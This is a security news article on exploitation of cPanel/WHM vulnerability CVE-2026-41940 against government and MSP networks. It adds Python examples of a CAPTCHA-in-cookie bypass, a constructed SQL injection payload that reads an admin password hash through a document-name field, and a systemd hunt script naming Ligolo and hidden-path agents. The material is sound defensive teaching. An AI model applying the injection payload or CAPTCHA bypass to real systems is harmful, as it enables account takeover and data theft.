Emerging Threats

cPanel Vulnerability Exploited to Target Gov't, MSP Networks


"The script uses hard-coded credentials and defeats the portal's CAPTCHA by reading the expected CAPTCHA value out of the server-issued session cookie rather than solving the challenge normally," Ctrl-Alt-Intel said.

CVE-2026-41940: a critical cPanel and WHM authentication bypass

On May 2, 2026, Ctrl-Alt-Intel reported active exploitation of CVE-2026-41940, a critical vulnerability in cPanel and WebHost Manager (WHM) that can produce an authentication bypass and allow remote attackers to gain elevated control of the control panel. Attackers have been observed using publicly available proof-of-concepts (PoCs) to weaponize the flaw against internet-facing control panels.

Targeting pattern: governments, militaries, MSPs and hosting providers — and an originating IP

The activity tracked by Ctrl-Alt-Intel originated from the IP address 95.111.250[.]175 and primarily singled out government and military domains associated with the Philippines (*.mil.ph and *.ph) and Laos (*.gov.la). A smaller cluster of targets included managed service providers and hosting providers in the Philippines, Laos, Canada, South Africa, and the U.S. The reporting ties these intrusions directly to exploitation attempts of the cPanel vulnerability using publicly available PoCs.

Prior custom exploit chain against an Indonesian defense training portal

Separately, Ctrl-Alt-Intel describes a prior, bespoke intrusion against an Indonesian defense-sector training portal. In that incident the actor reportedly already possessed valid credentials for the portal and combined an authenticated SQL injection with remote code execution to gain access. The group bypassed the portal's CAPTCHA by reading the expected CAPTCHA value from a server-issued session cookie rather than attempting to solve the challenge.
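The CAPTCHA weakness described above is a design flaw, not an OCR problem: the expected answer is stored client-side, so whoever holds the cookie holds the answer. The following is an added illustration, not code from the portal or from Ctrl-Alt-Intel's report. It assumes a cookie that carries a base64-encoded JSON object (the real portal's encoding is not described), shows the one-line "solver" such a design permits, and then the hardened pattern, where the cookie holds only an opaque, single-use token and the answer never leaves the server. The last function is a quick check a tester can run against any cookie a login page issues.

```python
import base64
import binascii
import hmac
import json
import secrets
from typing import Dict, Tuple

ALPHABET = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"


def _new_answer(length: int = 6) -> str:
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


# --- Vulnerable design (assumed encoding): the expected answer is serialised
# --- into the cookie that accompanies the CAPTCHA image.

def vulnerable_issue_challenge() -> Tuple[str, str]:
    """Return (cookie_value, answer). The answer would be rendered as an image,
    but it is equally readable from the cookie, which is the flaw."""
    answer = _new_answer()
    cookie = base64.b64encode(json.dumps({"captcha": answer}).encode()).decode()
    return cookie, answer


def vulnerable_verify(cookie: str, submitted: str) -> bool:
    expected = json.loads(base64.b64decode(cookie))["captcha"]
    return hmac.compare_digest(expected.encode(), submitted.upper().encode())


def attacker_read_answer(cookie: str) -> str:
    """What an intrusion script can do against this design: decode the
    cookie instead of solving the challenge."""
    return json.loads(base64.b64decode(cookie))["captcha"]


# --- Hardened design: the cookie holds only an opaque, single-use token and
# --- the answer lives in server-side state keyed by that token.

_PENDING: Dict[str, str] = {}  # in production: a server-side session store


def hardened_issue_challenge() -> Tuple[str, str]:
    answer = _new_answer()
    token = secrets.token_urlsafe(32)
    _PENDING[token] = answer
    return token, answer


def hardened_verify(token: str, submitted: str) -> bool:
    expected = _PENDING.pop(token, None)  # single use: a token cannot be replayed
    if expected is None:
        return False
    return hmac.compare_digest(expected.encode(), submitted.upper().encode())


# --- Tester's check: does the cookie reveal the answer, raw or base64-decoded?

def cookie_reveals_answer(cookie: str, answer: str) -> bool:
    candidates = [cookie]
    try:
        candidates.append(base64.b64decode(cookie, validate=True).decode("utf-8", "replace"))
    except (binascii.Error, ValueError):
        pass
    return any(answer in c for c in candidates)


if __name__ == "__main__":
    c, a = vulnerable_issue_challenge()
    print("vulnerable cookie leaks answer:", cookie_reveals_answer(c, a), attacker_read_answer(c) == a)
    t, a2 = hardened_issue_challenge()
    print("hardened token leaks answer:", cookie_reveals_answer(t, a2))
    print("first verify:", hardened_verify(t, a2), "replay:", hardened_verify(t, a2))
```

The check in `cookie_reveals_answer` is deliberately crude: a cookie that is merely signed (but not encrypted) still fails it, which is the point. Signing proves the server issued the value; it does nothing to hide it.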

Once authenticated, the actor moved to a document-management function. Ctrl-Alt-Intel said the vulnerable parameter was the field used to save a document name; the script injected SQL into that field when posting to the document-save endpoint.
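The report does not publish the portal's query or payload, so the following is an added, constructed example rather than the actor's script: it shows the shape of an authenticated injection through a document-name field on a save endpoint, using an in-memory SQLite schema (the table and column names are assumptions). The vulnerable handler splices the name into the UPDATE statement; a name built from a string-concatenation subquery makes the document's stored name become another table's data, which the attacker then reads back through the normal document list. The hardened handler binds the name as a parameter and stores the payload as harmless text.

```python
import sqlite3


def build_portal_db() -> sqlite3.Connection:
    """Constructed sample schema and rows; nothing here is from the real portal."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        CREATE TABLE documents(id INTEGER PRIMARY KEY, owner INTEGER, name TEXT);
        INSERT INTO users VALUES (1, 'admin', '$6$constructedhash$');
        INSERT INTO users VALUES (7, 'trainee', '$6$traineehash$');
        INSERT INTO documents VALUES (5, 7, 'notes.docx');
        """
    )
    return conn


def vulnerable_save_name(conn: sqlite3.Connection, user_id: int, doc_id: int, name: str) -> str:
    """The flaw: the user-supplied document name is spliced into the SQL text."""
    sql = f"UPDATE documents SET name = '{name}' WHERE id = {doc_id} AND owner = {user_id}"
    conn.execute(sql)
    # The save endpoint's response (or the document list) echoes the stored name.
    return conn.execute("SELECT name FROM documents WHERE id = ?", (doc_id,)).fetchone()[0]


def hardened_save_name(conn: sqlite3.Connection, user_id: int, doc_id: int, name: str) -> str:
    """Fix: bind the name as a parameter so it can never alter the query's structure."""
    conn.execute(
        "UPDATE documents SET name = ? WHERE id = ? AND owner = ?",
        (name, doc_id, user_id),
    )
    return conn.execute("SELECT name FROM documents WHERE id = ?", (doc_id,)).fetchone()[0]


# Constructed payload: closes the string literal, concatenates a subquery's
# result, then reopens the literal so the UPDATE stays syntactically valid.
# The vulnerable statement becomes:
#   UPDATE documents SET name = '' || (SELECT ...) || '' WHERE id = 5 AND owner = 7
PAYLOAD = "' || (SELECT password_hash FROM users WHERE username = 'admin') || '"


if __name__ == "__main__":
    conn = build_portal_db()
    print("vulnerable stored name:", vulnerable_save_name(conn, 7, 5, PAYLOAD))
    conn = build_portal_db()
    print("hardened stored name:  ", hardened_save_name(conn, 7, 5, PAYLOAD))
```

Note that the vulnerable version needs no stacked queries and no error messages: a single valid UPDATE is enough to pull one column out through a field the attacker is already allowed to write. That is why "the user was authenticated" is not a mitigation, and why the audit question for a save endpoint is simply whether every user-controlled value reaches the database as a bound parameter.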

Tools and persistence: AdapdixC2, OpenVPN, Ligolo and systemd

Analysis of compromised hosts shows the threat actor employing the AdapdixC2 command-and-control framework to control endpoints remotely. The actor also used tools such as OpenVPN and Ligolo to maintain network-level access.

"The actor built a durable access layer using OpenVPN, Ligolo, systemd persistence, and then used that access to pivot into an internal network and exfiltrate a substantial corpus of Chinese railway-sector documents," Ctrl-Alt-Intel added, describing both the persistence mechanisms and the apparent intel-gathering outcome of at least one intrusion.
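Durable access of the kind quoted above usually leaves a unit file behind, and unit files are cheap to audit. The following is an added hunting script, not something from the report and not specific to AdapdixC2: it parses systemd service units and flags three heuristics that are assumptions of this example rather than published indicators: a service binary launched from a scratch, home or hidden directory; any reference to Ligolo; and an OpenVPN client whose `--config` lives outside `/etc/openvpn/`. The unit contents and the 203.0.113.0/24 address are constructed samples.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Heuristics (assumptions of this example, not IOCs from the report).
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/")
OPENVPN_CONF_DIR = "/etc/openvpn/"


@dataclass
class Finding:
    unit: str
    reason: str
    exec_start: str


def parse_unit(text: str) -> Dict[str, Dict[str, List[str]]]:
    """Minimal systemd unit parser: section -> key -> list of values.
    A list is needed because keys such as ExecStart may repeat."""
    sections: Dict[str, Dict[str, List[str]]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current].setdefault(key.strip(), []).append(value.strip())
    return sections


def _binary_of(exec_start: str) -> str:
    """First token of ExecStart with systemd's prefix characters (@ - : + !) removed."""
    parts = exec_start.split()
    return parts[0].lstrip("@-:+!") if parts else ""


def _openvpn_config(exec_start: str) -> Optional[str]:
    m = re.search(r"--config\s+(\S+)", exec_start)
    return m.group(1) if m else None


def hunt_units(units: Dict[str, str]) -> List[Finding]:
    """units maps unit file path -> file contents (e.g. read from /etc/systemd/system)."""
    findings: List[Finding] = []
    for path, text in units.items():
        service = parse_unit(text).get("Service", {})
        for exec_start in service.get("ExecStart", []):
            binary = _binary_of(exec_start)
            if binary.startswith(SCRATCH_DIRS) or "/." in binary:
                findings.append(Finding(path, "ExecStart from scratch, home or hidden path", exec_start))
            if "ligolo" in exec_start.lower():
                findings.append(Finding(path, "Ligolo tunnelling agent", exec_start))
            conf = _openvpn_config(exec_start)
            if "openvpn" in binary and conf and not conf.startswith(OPENVPN_CONF_DIR):
                findings.append(Finding(path, "OpenVPN config outside /etc/openvpn", exec_start))
    return findings


# Constructed sample unit files (not real artifacts). 203.0.113.0/24 is documentation space.
SAMPLE_UNITS = {
    "/etc/systemd/system/sshd.service":
        "[Unit]\nDescription=OpenSSH server\n[Service]\nExecStart=/usr/sbin/sshd -D\n"
        "[Install]\nWantedBy=multi-user.target\n",
    "/etc/systemd/system/netcheck.service":
        "[Unit]\nDescription=network check\n[Service]\nRestart=always\n"
        "ExecStart=/dev/shm/.x/agent -connect 203.0.113.10:11601 -ignore-cert\n"
        "[Install]\nWantedBy=multi-user.target\n",
    "/etc/systemd/system/vpn-client.service":
        "[Service]\nExecStart=/usr/sbin/openvpn --config /root/.cache/client.ovpn\n"
        "Restart=on-failure\n[Install]\nWantedBy=multi-user.target\n",
    "/etc/systemd/system/ligolo-agent.service":
        "[Service]\nExecStart=/usr/local/bin/ligolo-agent -connect 203.0.113.10:11601\n"
        "[Install]\nWantedBy=multi-user.target\n",
}


if __name__ == "__main__":
    for f in hunt_units(SAMPLE_UNITS):
        print(f"{f.unit}: {f.reason}: {f.exec_start}")
```

On a live host, feed `hunt_units` the contents of `/etc/systemd/system/*.service` and each user's `~/.config/systemd/user/*.service`, and compare against the package-owned units under `/usr/lib/systemd/system`; a tunnelling agent that was planted by hand will not be owned by any package.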

Rapid, wide weaponization: Censys and Shadowserver telemetry

Ctrl-Alt-Intel's findings sit alongside broader telemetry indicating near-immediate exploitation following disclosure. Censys reported evidence that the cPanel vulnerability was being weaponized by multiple third parties within 24 hours of public disclosure, including deployments of Mirai botnet variants and a ransomware strain called Sorry.

Shadowserver Foundation data shows the scale of scanning and brute-force activity tied to CVE-2026-41940: at least 44,000 IP addresses likely compromised via the vulnerability engaged with Shadowserver's honeypots on April 30, 2026. That number fell to 3,540 by May 3, 2026, according to Shadowserver's counts.

What this means for technologists, policymakers, and MSPs

  • Technologists and security teams: will need to monitor for indicators described by Ctrl-Alt-Intel — reuse of publicly-available PoCs against cPanel/WHM, the presence of AdapdixC2, and lateral-access tooling such as OpenVPN and Ligolo — and to investigate unusual document-management activity that could indicate SQL injection or exfiltration.
  • Policymakers and government IT owners: are confronted with targeted exploitation against government and military domains in the Philippines and Laos, and a documented intrusion that resulted in exfiltration of Chinese railway-sector documents; those specifics may shape incident response and cross-border reporting priorities.
  • MSPs and hosting providers: were explicitly listed among targets in the Philippines, Laos, Canada, South Africa, and the U.S., and must account for the observed post-compromise behaviors — scanning, brute-force activity, and the deployment of Mirai and ransomware strains reported by Censys and Shadowserver.

The record assembled by Ctrl-Alt-Intel, Censys, and Shadowserver sketches a campaign that moved quickly from PoCs to varied operational activity: targeted espionage against a defense-sector portal, broad scanning and brute-force waves tied to tens of thousands of likely compromised IPs, and the use of persistent network-access tooling together with the AdapdixC2 framework. Who stands behind these operations remains unspecified in the reporting; what is clear is the speed and diversity of exploitation enabled by CVE-2026-41940.
